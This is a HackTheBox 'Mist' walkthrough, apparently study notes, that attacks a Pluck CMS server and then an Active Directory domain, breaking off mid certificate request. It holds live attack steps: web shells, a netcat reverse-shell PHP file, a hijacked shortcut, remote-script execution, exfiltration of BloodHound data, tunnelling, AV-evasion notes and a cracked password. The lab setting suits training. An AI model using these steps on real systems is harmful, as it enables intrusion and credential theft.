Mist

Recon

nmap_scan.log

.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.17:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.10.11.17
Depending on the complexity of the script, results may take some time to appear.
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2024-07-10 19:12 UTC
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:12
Completed NSE at 19:12, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:12
Completed NSE at 19:12, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:12
Completed NSE at 19:12, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 19:12
Completed Parallel DNS resolution of 1 host. at 19:12, 0.04s elapsed
DNS resolution of 1 IPs took 0.04s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 19:12
Scanning 10.10.11.17 [1 port]
Discovered open port 80/tcp on 10.10.11.17
Completed Connect Scan at 19:12, 0.08s elapsed (1 total ports)
Initiating Service scan at 19:12
Scanning 1 service on 10.10.11.17
Completed Service scan at 19:12, 6.21s elapsed (1 service on 1 host)
NSE: Script scanning 10.10.11.17.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:12
Completed NSE at 19:12, 5.11s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:12
Completed NSE at 19:12, 0.38s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:12
Completed NSE at 19:12, 0.00s elapsed
Nmap scan report for 10.10.11.17
Host is up, received user-set (0.079s latency).
Scanned at 2024-07-10 19:12:45 UTC for 13s

PORT   STATE SERVICE REASON  VERSION
80/tcp open  http    syn-ack Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-title: Mist - Mist
|_Requested resource was http://10.10.11.17/?file=mist
|_http-generator: pluck 4.7.18
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 2 disallowed entries 
|_/data/ /docs/

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:12
Completed NSE at 19:12, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:12
Completed NSE at 19:12, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:12
Completed NSE at 19:12, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.92 seconds

└─$ grep mist /etc/hosts
10.10.11.17     mist.htb
192.168.100.100         mist.htb DC01.mist.htb
192.168.100.101         ms01.mist.htb

HTTP (80)

Pluck CMS

file variable is used to display pages, attempt at LFI results in Hacking Attempt Detected.

Writeup.png

We have a login page on highlighted admin:

Writeup-1.png

Pluck version is also shown with login page. Pluck v4.7.18 - Remote Code Execution (RCE)

└─$ curl -L https://www.exploit-db.com/download/51592 -s | sed 's/localhost\/pluck/10.10.11.17/g' > pluck_exploit.py
└─$ weevely generate Password123$ miri.php
Generated 'miri.php' with password 'Password123$' of 781 byte size.
└─$ zip -r mirabbas.zip miri.php
  adding: miri.php (deflated 32%)
└─$ py pluck_exploit.py
ZIP file path: ./mirabbas.zip
Login account
ZIP file download.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1 Server at 10.10.11.17 Port 80</address>
</body></html>

The exploit was not successful, most probably because the upload feature is enabled to only authenticated users.

[CVE-2023-50564](https://www.cvedetails.com/cve/CVE-2023-50564/ "CVE-2023-50564 security vulnerability details) was also not successful

http://10.10.11.17/data/inc/modules_install.php
> Access denied!

Pluck CMS 4.7 - Directory Traversal seems probable considering we have access to the modules

# Exploit Title: Pluck 4.7 Directory Traversal
# Google Dork: filetype:php inurl:"/data/modules/albums/albums_getimage.php?image="
# Date: 08/05/15
# Exploit Author: Wadeek
# Vendor Homepage: http://www.pluck-cms.org/?file=home
# Software Link: http://www.opensourcecms.com/scripts/redirect/download.php?id=167
# Version: 4.7
# Tested on: Xampp on Windows7
###################################################################################
PoC = http://127.0.0.1/pluck-4_7/data/modules/albums/albums_getimage.php?image=\..\..\..\..\..\..\..\Windows\system.ini
###################################################################################

Writeup-2.png

This method was not successful because any indication of .. in url results in Blocked Hacking Attempt action.

For CVE-2023-50564 we accessed /data/inc, but /data is not showing index page for folder directory listings.

└─$ git clone https://github.com/pluck-cms/pluck.git
└─$ cd ./pluck/data
└─$ find . -name '*.php' | grep -v '/lang/' > phpfuzz.txt
└─$ ffuf -u 'http://10.10.11.17/data/FUZZ' -w ./phpfuzz.txt -mc all -fr 'denied'
       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.11.17/data/FUZZ
 :: Wordlist         : FUZZ: /home/woyag/Desktop/Rooms/Mist/pluck/data/phpfuzz.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: all
 :: Filter           : Regexp: denied
________________________________________________

./inc/lib/tarlib.class.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 108ms]
./inc/lib/simple-php-captcha/simple-php-captcha.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 124ms]
./inc/lib/simple-php-captcha/index.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 136ms]
./themes/oldstyle/info.php [Status: 200, Size: 251, Words: 24, Lines: 10, Duration: 93ms]
./themes/default/info.php [Status: 200, Size: 253, Words: 25, Lines: 10, Duration: 100ms]
./modules/albums/albums_getimage.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 87ms]
./settings/langpref.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 102ms]
:: Progress: [72/72] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::

GitHub repository shows only 1 file in settings and that's langpref.php, but there seems to be more to it!

Writeup-3.png

We are able to find albums module in settings too, but we can't read PHP files...

Writeup-4.png

Leaked Credentials

Note: Inclusion of files without authentication #122 (Adding after writeup)

For some reason we can read files via /data/modules/albums/albums_getimage.php from /data/settings/modules/albums/*

└─$ curl http://10.10.11.17/data/modules/albums/albums_getimage.php?image=mist.php
<?php
$album_name = 'Mist';
?>30
└─$ curl http://10.10.11.17/data/modules/albums/albums_getimage.php?image=admin_backup.php
<?php
$ww = 'c81dde783f9543114ecd9fa14e8440a2a868bfe0bacdf14d29fce0605c09d5a2bcd2028d0d7a3fa805573d074faa15d6361f44aec9a6efe18b754b3c265ce81e';
?>146 

Hash	Type	Value
c81dde783f9543114ecd9fa14e8440a2a868bfe0bacdf14d29fce0605c09d5a2 bcd2028d0d7a3fa805573d074faa15d6361f44aec9a6efe18b754b3c265ce81e	sha512	lexypoo97

Writeup-5.png

We are able to login with password into the CMS and we can now utilize previous exploits and gain RCE.

The PoC script for module upload kept failing so I uploaded the p0wny.php shell manually and it worked.

Writeup-6.png

Reverse Shell (ms01\svc_web)

So as always HTB deletes this folder periodically so p0wnly shell can't stay active for more then a minute... I was trying to use PowerShell #3 (Base64) as usual, but it seems like AV is active on box! One way to bypass this would be to upload nc.exe and get connection back.

└─$ cp /usr/share/windows-binaries/nc.exe .
└─$ cat rev.php
<?php
system(".\\nc.exe 10.10.14.129 4444 -e powershell");
?> 
└─$ zip -r rev.zip rev.php nc.exe 
  adding: rev.php (deflated 3%)
  adding: nc.exe (deflated 52%)

PS C:\> whoami /all
User Name    SID
============ ==============================================
ms01\svc_web S-1-5-21-1075431363-3458046882-2723919965-1000

Group Name                           Type             SID          Attributes
==================================== ================ ============ ==================================================
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account           Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label            S-1-16-12288

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeCreateGlobalPrivilege       Create global objects          Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

Might as well update hosts file.

PS C:\xampp\htdocs\data\settings> cat options.php
<?php
$sitetitle = 'Mist';
$email = 'admin@mist.htb';
?>

xampp has only Pluck CMS installation and that's about it, otherwise it seems like default everything.

Root directory does contain something unusual:

PS C:\> ls
    Directory: C:\
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         3/10/2024   1:50 AM                Common Applications
d-----          5/8/2021   1:20 AM                PerfLogs
d-r---         2/20/2024   5:44 AM                Program Files
d-----          5/8/2021   2:40 AM                Program Files (x86)
d-r---         2/21/2024  12:37 PM                Users
d-----         3/26/2024  12:02 PM                Windows
d-----         3/10/2024   3:21 AM                xampp

PS C:\> ls -Filter *.lnk | % {
    $lnkPath = $_.FullName
    $shell = New-Object -ComObject WScript.Shell
    $shortcut = $shell.CreateShortcut($lnkPath)
    
    [PSCustomObject]@{
        ShortcutPath = $lnkPath
        TargetPath   = $shortcut.TargetPath
        Arguments    = $shortcut.Arguments
        Description  = $shortcut.Description
        WorkingDirectory = $shortcut.WorkingDirectory
        IconLocation = $shortcut.IconLocation
    }

    $shortcutInfo.PSObject.Properties | % {
        Write-Output "$($_.Name): $($_.Value)"
    }
    Write-Output ""
} 

ShortcutPath     : C:\Common Applications\Calculator.lnk
TargetPath       : C:\Windows\system32\win32calc.exe
Arguments        :
Description      : Performs basic arithmetic tasks with an on-screen calculator.
WorkingDirectory :
IconLocation     : %windir%\system32\win32calc.exe,0

:

ShortcutPath     : C:\Common Applications\Notepad.lnk
TargetPath       : C:\Windows\system32\notepad.exe
Arguments        :
Description      : Creates and edits text files using basic text formatting.
WorkingDirectory : %HOMEDRIVE%%HOMEPATH%
IconLocation     : %windir%\system32\notepad.exe,0

:

ShortcutPath     : C:\Common Applications\Wordpad.lnk
TargetPath       : C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe
Arguments        :
Description      : Creates and edits text documents with complex formatting.
WorkingDirectory :
IconLocation     : %ProgramFiles%\Windows NT\Accessories\wordpad.exe,0

Privilege Escalation (mist\brandon.keywarp)

PS C:\> $directory = "C:\Common Applications"
$watcher = New-Object System.IO.FileSystemWatcher
$watcher.Path = $directory
$watcher.Filter = "*.lnk"
$watcher.IncludeSubdirectories = $true
$watcher.NotifyFilter = [System.IO.NotifyFilters]'FileName, LastAccess'
$accessLog = @{}
$action = {
    $filePath = $eventArgs.FullPath
    if ($accessLog.ContainsKey($filePath)) {
        $accessLog[$filePath]++
    } else {
        $accessLog[$filePath] = 1
    }
}
Register-ObjectEvent $watcher 'Changed' -Action $action
Register-ObjectEvent $watcher 'Created' -Action $action
Register-ObjectEvent $watcher 'Deleted' -Action $action
Register-ObjectEvent $watcher 'Renamed' -Action $action
$watcher.EnableRaisingEvents = $true
Write-Output "Monitoring .lnk file access in $directory for 2 minutes..."
Start-Sleep -Seconds 120
Write-Output "Total .lnk file accesses in 2 minutes:"
foreach ($file in $accessLog.Keys) { Write-Output "File: $file, Access Count: $($accessLog[$file])"; }
Unregister-Event -SourceIdentifier * -ErrorAction SilentlyContinue
$watcher.Dispose()
Id     Name            PSJobTypeName   State         HasMoreData     Location             Command
--     ----            -------------   -----         -----------     --------             -------
13     37e618dd-cb3...                 NotStarted    False                                ...
14     3d7644c5-880...                 NotStarted    False                                ...
15     ccfaf013-be0...                 NotStarted    False                                ...
16     1af4f5d6-de0...                 NotStarted    False                                ...
Monitoring .lnk file access in C:\Common Applications for 2 minutes...
Total .lnk file accesses in 2 minutes:
File: C:\Common Applications\Calculator.lnk, Access Count: 1
File: C:\Common Applications\Wordpad.lnk, Access Count: 1
File: C:\Common Applications\Notepad.lnk, Access Count: 1

# Credits: ChatGPT D:

Looks like this lnk files are periodically accessed by someone which shouldn't be ms01\svc_web

We also have write permission on the directory!

Get-Acl 'Common Applications' | Format-List

Path   : Microsoft.PowerShell.Core\FileSystem::C:\Common Applications
Owner  : BUILTIN\Administrators
Group  : MS01\None
Access : NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  FullControl
         BUILTIN\Users Allow  Write, ReadAndExecute, Synchronize
         MS01\Administrator Allow  FullControl
Audit  :
Sddl   : O:BAG:S-1-5-21-1075431363-3458046882-2723919965-513D:PAI(A;OICI;FA;;;SY)(A;OICI;FA;;;BA)(A;OICI;0x1201bf;;;BU)
         (A;OICI;FA;;;LA)

Using Golang Reverse Shell get connection (make sure to hardcode IP:PORT)

# $targetPath = "C:\Users\Public\rev.exe"
$shortcutPath = "C:\Common Applications\Notepad.lnk"
$targetPath = "C:\xampp\htdocs\data\modules\rev\rev.exe"
$wscript = New-Object -ComObject WScript.Shell
$shortcut = $wscript.CreateShortcut($shortcutPath)
$shortcut.TargetPath = $targetPath
$shortcut.Save()

After a minute or so we get a connection back:

PS C:\Windows\system32> whoami /all
User Name            SID
==================== ==============================================
mist\brandon.keywarp S-1-5-21-1045809509-3006658589-2426055941-1110

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH                         Well-known group S-1-5-3      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

Privilege Escalation (MS01 Administrator)

Enumeration

PS C:\users\Brandon.Keywarp> IEX(IWR http://10.10.14.129/PrivescCheck.ps1 -UseBasicParsing)

PS C:\users\public> Invoke-PrivescCheck
...
----------------------------------------------------------------
| CATEGORY | TA0043 - Reconnaissance                           |
| NAME     | User groups                                       |
----------------------------------------------------------------
| Get information about the groups the current user belongs to |
| (name, type, SID).                                           |
----------------------------------------------------------------
[*] Status: Informational

Name                                       Type           SID
----                                       ----           ---
MIST\Domain Users                          Group          S-1-5-21-1045809509-3006658589-2426055941-513
Everyone                                   WellKnownGroup S-1-1-0
BUILTIN\Users                              Alias          S-1-5-32-545
NT AUTHORITY\BATCH                         WellKnownGroup S-1-5-3
CONSOLE LOGON                              WellKnownGroup S-1-2-1
NT AUTHORITY\Authenticated Users           WellKnownGroup S-1-5-11
NT AUTHORITY\This Organization             WellKnownGroup S-1-5-15
LOCAL                                      WellKnownGroup S-1-2-0
NT AUTHORITY\LogonSessionId_0_14407262     LogonSession   S-1-5-5-0-14407262
Authentication authority asserted identity WellKnownGroup S-1-18-1
Mandatory Label\Medium Mandatory Level     Label          S-1-16-8192
...
----------------------------------------------------------------
| CATEGORY | TA0008 - Lateral Movement                         |
| NAME     | UAC settings                                      |
----------------------------------------------------------------
| Check whether User Access Control (UAC) is enabled and       |
| whether it filters the access token of local administrator   |
| accounts when they authenticate remotely.                    |
----------------------------------------------------------------
[*] Status: Vulnerable - Low

Key         : HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
Value       : EnableLUA
Data        : 1
Vulnerable  : False
Description : UAC is enabled.

Key         : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Value       : LocalAccountTokenFilterPolicy
Data        : (null)
Vulnerable  : False
Description : Only the built-in Administrator account (RID 500) can be granted a high integrity token when
              authenticating remotely (default).

Key         : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Value       : FilterAdministratorToken
Data        : (null)
Vulnerable  : True
Description : The built-in administrator account (RID 500) is granted a high integrity token when authenticating
              remotely (default).
...
----------------------------------------------------------------
| CATEGORY | TA0008 - Lateral Movement                         |
| NAME     | LAPS                                              |
----------------------------------------------------------------
| Check whether LAPS is configured and enabled. Note that this |
| applies to domain-joined machines only.                      |
----------------------------------------------------------------
[*] Status: Vulnerable - Medium

Policy      : Enable local admin password management (LAPS legacy)
Key         : HKLM\Software\Policies\Microsoft Services\AdmPwd
Default     : 0
Value       : (null)
Description : The local administrator password is not managed (default).

Policy      : LAPS > Configure password backup directory
Key         : HKLM\Software\Microsoft\Policies\LAPS
Default     : 0
Value       : (null)
Description : The local administrator password is not backed up (default).
... 
----------------------------------------------------------------
|                 ~~~ PrivescCheck Summary ~~~                 |
----------------------------------------------------------------
 TA0004 - Privilege Escalation
 Service binary permissions  High
 - Driver co-installers  Low
 TA0006 - Credential Access
 - LSA Protection  Low
 - Credential Guard  Low
 TA0008 - Lateral Movement
 - UAC settings  Low
 - LAPS  Medium

WARNING: To get more info, run this script with the option '-Extended'.

Looks like we are on a computer, not domain controller...

PS C:\users> net user
User accounts for \\MS01
-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
svc_web                  WDAGUtilityAccount
The command completed successfully.

PS C:\users> net user /domain
User accounts for \\DC01.mist.htb
-------------------------------------------------------------------------------
Administrator            Brandon.Keywarp          Florence.Brown
Guest                    Harry.Beaucorn           Jonathan.Clinton
krbtgt                   Markus.Roheb             op_Markus.Roheb
op_Sharon.Mullard        Sharon.Mullard           Shivangi.Sumpta
svc_cabackup             svc_smb

PS C:\users> ipconfig /all
Windows IP Configuration

   Host Name . . . . . . . . . . . . : MS01
   Primary Dns Suffix  . . . . . . . : mist.htb
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : mist.htb

Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft Hyper-V Network Adapter
   Physical Address. . . . . . . . . : 00-15-5D-16-CB-07
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   IPv4 Address. . . . . . . . . . . : 192.168.100.101(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.100.100
   DNS Servers . . . . . . . . . . . : 192.168.100.100
   NetBIOS over Tcpip. . . . . . . . : Enabled
PS C:\users> ping 192.168.100.100
Pinging 192.168.100.100 with 32 bytes of data:
Reply from 192.168.100.100: bytes=32 time<1ms TTL=128
Reply from 192.168.100.100: bytes=32 time<1ms TTL=128
Reply from 192.168.100.100: bytes=32 time<1ms TTL=128
Reply from 192.168.100.100: bytes=32 time<1ms TTL=128

Ping statistics for 192.168.100.100:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

Update /etc/hosts

Use chisel to connect to Mist network:

└─$ chisel server -p 36000 --reverse
2024/07/17 14:24:48 server: Reverse tunnelling enabled
2024/07/17 14:24:48 server: Fingerprint NqMQ96o3Vp3paDt5eacPr6GbiNo+wj8sUnLR6g2q7oU=
2024/07/17 14:24:48 server: Listening on http://0.0.0.0:36000
2024/07/17 14:37:52 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
---
# PS C:\xampp\htdocs\files> Start-Job -ScriptBlock { & "C:\xampp\htdocs\files\chisel.exe" client 10.10.14.73:36000 R:socks; }
PS C:\xampp\htdocs\files> Start-Job -ScriptBlock { & "C:\xampp\htdocs\files\chisel.exe" client 10.10.14.73:36000 R:socks 4444:10.10.14.73:80; }
Id     Name            PSJobTypeName   State         HasMoreData     Location             Command
--     ----            -------------   -----         -----------     --------             -------
3      Job3            BackgroundJob   Running       True            localhost             & "C:\xampp\htdocs\fi..."

PS C:\xampp\htdocs\files> get-job
Id     Name            PSJobTypeName   State         HasMoreData     Location             Command
--     ----            -------------   -----         -----------     --------             -------
3      Job3            BackgroundJob   Running       True            localhost             & "C:\xampp\htdocs\fi..."

Note: Background the task to keep shell alive.

└─$ tail /etc/proxychains4.conf
[ProxyList]
...
socks5  127.0.0.1 1080 # <-- Required
└─$ proxychains netexec smb 192.168.100.100 -u '' -p '' --shares
SMB         192.168.100.100 445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:mist.htb) (signing:True) (SMBv1:False)
SMB         192.168.100.100 445    DC01             [+] mist.htb\:
SMB         192.168.100.100 445    DC01             [-] Error enumerating shares: STATUS_ACCESS_DENIED
└─$ proxychains netexec smb 192.168.100.101 -u '' -p '' --shares
SMB         192.168.100.101 445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:mist.htb) (signing:False) (SMBv1:False)
SMB         192.168.100.101 445    MS01             [-] mist.htb\: STATUS_ACCESS_DENIED
SMB         192.168.100.101 445    MS01             [-] Error enumerating shares: Error while reading from remote

*.101 seems to be MS01 Computer, *.100 Domain Controller.

Bloodhound

Gather information about domain users:

PS C:\users\public> iwr 10.10.14.129/SharpHound.exe -outfile sh.exe
PS C:\users\public> .\sh.exe -c all --zipfilename sh.zip
PS C:\users\public> certutil.exe -encode 20240711034507_sh.zip sh.zip.base64

I was going to exfiltrate data with nc.exe, but it was now identified as virus?... Odd.

└─$ listen > sh.zip.base64
---
PS C:\users\public> iwr 10.10.14.129 -Method POST -InFile sh.zip.base64                                  
---
└─$ ^C
└─$ tail -n +9 sh.zip.base64 | head -n -1 | base64 -di > sh.zip

Start Bloodhound community edition (dockerfile) and start analyzing.

Writeup-7.png

Looks like we are dealing with Certificates.

Writeup-8.png

PS C:\users\public> net group /domain

Group Accounts for \\DC01.mist.htb
-------------------------------------------------------------------------------
*CA Backup
*Certificate Managers
*Certificate Services
*Cloneable Domain Controllers
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Operatives
*Protected Users
*Read-only Domain Controllers
*Schema Admins
*ServiceAccounts
*Virtualization Services

Certify

HackerRecipies > AD-CS

└─$ curl -LOs https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Certify.exe
---
PS C:\users\public> iwr 10.10.14.129/Certify.exe -outfile cy.exe

The antivirus kept deleting the file, insisting it was malicious. It said the same thing about netcat too, but initially we got connection via netcat so what's the problem?

I moved back to modules directory and antivirus seemed chill, this must mean directory in xampp is excluded from antivirus detection and we can go bonkers! (but do mind that it gets periodically deleted...)

PS C:\xampp\htdocs\data\modules\rev> iwr 10.10.14.129/Certify.exe -outfile cy.exe
PS C:\xampp\htdocs\data\modules\rev> .\cy.exe cas
  v1.0.0

[*] Action: Find certificate authorities
[*] Using the search base 'CN=Configuration,DC=mist,DC=htb'

[*] Root CAs

    Cert SubjectName              : CN=mist-DC01-CA, DC=mist, DC=htb
    Cert Thumbprint               : A515DF0E980933BEC55F89DF02815E07E3A7FE5E
    Cert Serial                   : 3BF0F0DDF3306D8E463B218B7DB190F0
    Cert Start Date               : 2/15/2024 7:07:23 AM
    Cert End Date                 : 2/15/2123 7:17:23 AM
    Cert Chain                    : CN=mist-DC01-CA,DC=mist,DC=htb

[*] NTAuthCertificates - Certificates that enable authentication:

    Cert SubjectName              : CN=mist-DC01-CA, DC=mist, DC=htb
    Cert Thumbprint               : A515DF0E980933BEC55F89DF02815E07E3A7FE5E
    Cert Serial                   : 3BF0F0DDF3306D8E463B218B7DB190F0
    Cert Start Date               : 2/15/2024 7:07:23 AM
    Cert End Date                 : 2/15/2123 7:17:23 AM
    Cert Chain                    : CN=mist-DC01-CA,DC=mist,DC=htb

[*] Enterprise/Enrollment CAs:

    Enterprise CA Name            : mist-DC01-CA
    DNS Hostname                  : DC01.mist.htb
    FullName                      : DC01.mist.htb\mist-DC01-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=mist-DC01-CA, DC=mist, DC=htb
    Cert Thumbprint               : A515DF0E980933BEC55F89DF02815E07E3A7FE5E
    Cert Serial                   : 3BF0F0DDF3306D8E463B218B7DB190F0
    Cert Start Date               : 2/15/2024 7:07:23 AM
    Cert End Date                 : 2/15/2123 7:17:23 AM
    Cert Chain                    : CN=mist-DC01-CA,DC=mist,DC=htb
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
      Allow  ManageCA, ManageCertificates               MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
    Enrollment Agent Restrictions : None

    Enabled Certificate Templates:
        BackupSvcAuthentication
        ManagerAuthentication
        UserAuthentication
        ComputerAuthentication
        DirectoryEmailReplication
        DomainControllerAuthentication
        KerberosAuthentication
        EFSRecovery
        EFS
        WebServer
        Machine
        User
        SubCA
        Administrator

Certify completed in 00:00:32.1879029
PS C:\xampp\htdocs\data\modules\rev> .\cy.exe find /vulnerable 
  v1.0.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=mist,DC=htb'
[*] Listing info about the Enterprise CA 'mist-DC01-CA'

    Enterprise CA Name            : mist-DC01-CA
    DNS Hostname                  : DC01.mist.htb
    FullName                      : DC01.mist.htb\mist-DC01-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=mist-DC01-CA, DC=mist, DC=htb
    Cert Thumbprint               : A515DF0E980933BEC55F89DF02815E07E3A7FE5E
    Cert Serial                   : 3BF0F0DDF3306D8E463B218B7DB190F0
    Cert Start Date               : 2/15/2024 7:07:23 AM
    Cert End Date                 : 2/15/2123 7:17:23 AM
    Cert Chain                    : CN=mist-DC01-CA,DC=mist,DC=htb
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
      Allow  ManageCA, ManageCertificates               MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
    Enrollment Agent Restrictions : None

[+] No Vulnerable Certificates Templates found!

Certify completed in 00:00:09.0251909

Writeup-9.png

Probably our privilege escalation target is Sharon:

PS C:\users> ls
    Directory: C:\users
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         3/20/2024   6:28 AM                Administrator
d-----         2/20/2024   6:02 AM                Administrator.MIST
d-----         3/20/2024   5:42 AM                Brandon.Keywarp
d-r---         7/12/2024  12:20 PM                Public
d-----         2/20/2024   9:39 AM                Sharon.Mullard
d-----         2/21/2024   3:46 AM                svc_web

Generate Certificate

PS C:\xampp\htdocs\data\modules\rev> .\cy.exe request /ca:DC01.mist.htb\mist-DC01-CA /template:User
  v1.0.0

[*] Action: Request a Certificates

[*] Current user context    : MIST\Brandon.Keywarp
[*] No subject name specified, using current context as subject.

[*] Template                : User
[*] Subject                 : CN=Brandon.Keywarp, CN=Users, DC=mist, DC=htb

[*] Certificate Authority   : DC01.mist.htb\mist-DC01-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 64

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
